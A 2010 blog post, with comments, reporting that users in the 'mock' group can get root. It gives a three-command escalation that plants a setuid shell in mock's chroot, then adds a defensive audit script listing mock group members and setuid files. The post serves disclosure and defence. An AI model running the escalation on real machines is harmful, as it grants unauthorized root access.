2010-11-09

Doesn't Anyone Think This Is a Problem?

I can trivially get root on a machine if the user is a member of the 'mock' group.

$ /usr/bin/mock -r epel-5-i386 --copyin /bin/sh /
$ /usr/bin/mock -r epel-5-i386 --shell 'chmod 4755 /sh'
$ /var/lib/mock/epel-5-i386/root/sh
#

In order to use mock properly, you have to be in the mock group. It just doesn't work properly even with sudo unless you're in that group. Once you're in that group, you can elevate privs in the chroot it creates and run arbitrary scripts.

I did a quick google and I can't even find anything with keywords like "mock is a gigantic security hole because mock has lots of suid root stuff in it that lets you trivially root a machine if you've ever gotten it to work properly in the past."

It doesn't make any sense to me. Talking to two admins today led me to conclude that they both knew about this problem, and thought it wasn't an issue.
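
An audit for the situation this post describes, as an added example (not code from the original post or from the mock project): it lists who is in the mock group and which setuid/setgid files exist under the chroot base. The function names and the /etc/group default are assumptions; /var/lib/mock is the path shown in the session above.

```sh
#!/bin/sh
# Added example. Assumes a group(5)-format file and mock's chroot base
# /var/lib/mock (the path on this page); both can be overridden.

# Print the members listed for a group in a group(5)-format file.
# Users whose *primary* group is this one are not listed there.
group_members() {
    # $1 = group name, $2 = group file (default /etc/group)
    awk -F: -v g="$1" '
        $1 == g && $4 != "" {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) print m[i]
        }' "${2:-/etc/group}"
}

# List setuid/setgid regular files under the chroot base directory.
# Packaged setuid binaries inside a chroot (su, passwd, ...) show up
# too, so the output needs triage; a stray /sh does not belong.
find_setid_files() {
    # $1 = base directory (default /var/lib/mock)
    base="${1:-/var/lib/mock}"
    [ -d "$base" ] || return 0
    find "$base" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -print 2>/dev/null
}

audit_mock() {
    # $1 = base directory, $2 = group file
    echo "Members of the mock group (treat as root-equivalent):"
    group_members mock "${2:-/etc/group}" | sed 's/^/  /'
    echo "setuid/setgid files under ${1:-/var/lib/mock}:"
    find_setid_files "${1:-/var/lib/mock}" | sed 's/^/  /'
}

audit_mock "$@"
```

Run it as root so that find can read every chroot; as an unprivileged user, unreadable directories are skipped silently.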

4 comments:

glyph said...

Wow. Shouldn't there be a CVE for this?

Alan said...

This is probably true whenever you install mock on your own machine and you're just being told to "add a user to the mock group" and you feel safe adding somebody to that group, without letting him be root.

I've never made that supposition - I usually directly give root permissions to people who need to use mock.

The "real issue" is that mock lies about making people "feel secure" because somebody is in the mock group and not root. This would probably deserve a ticket.

cocinas exclusivas said...

this is not a problem that cannot be solved...:)